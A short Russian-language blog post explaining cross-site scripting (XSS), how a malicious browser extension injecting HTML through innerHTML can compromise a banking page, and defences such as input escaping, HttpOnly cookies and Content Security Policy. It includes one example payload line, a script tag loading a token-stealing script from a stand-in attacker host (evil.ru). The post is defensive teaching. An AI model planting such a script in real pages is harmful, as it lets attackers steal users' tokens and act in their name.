tgoop.com/prog_way_blog/360
Create:
Last Update:
Last Update:
Что такое XSSXSS
— это тип уязвимости, при которой злоумышленник внедряет в страницу свой скрипт, и этот скрипт выполняется в браузере жертвы как будто от имени доверенного сайта
При помощи XSS зачастую можно потерять cookies, localStorage, а также получить подмену содержимого страницы (например, на страницу встроится какая-нибудь фишинговая форма)
На основе вышеописанного и украденных данных авторизации уже можно сделать любое действие от лица пользователя, будь то отправка сообщения, банковский перевод или любая другая операция
Как по мне, самый распространенный вариант попасться на
XSS
атаку сейчас — поставить себе недобросовестное браузерное расширение и дать ему слишком много разрешений на ходуСайты, не защищённые
CSP
или с 'unsafe-inline'
директивой — лакомый кусочек для таких типов атак1. Вы устанавливаете расширение, которое парсит страницу (ваш банк, например) и вставляет
HTML
через innerHTML
2. Внедряется какой-нибудь
<script src="https://evil.ru/steal.js"></script>
, этот скрипт крадёт токен из localStorage
и отправляет на сервер злоумышленникаИтог: с вашим токеном можно украсть деньги, данные или сделать что-угодно от вашего имени. И это лишь один из тысячи примеров
Есть несколько основных способов защититься:
— Всегда экранировать пользовательский ввод
— Не использовать небезопасные методы редактирования
HTML
разметки (например, innerHTML
)— Не забывать про флаг
HttpOnly
на куках— Использовать
Content Security Policy
— CSP
(об этом в одном из следующих постов)Спасибо за прочтение, это важно для меня
@prog_way_blog — чат — #theory #useful #web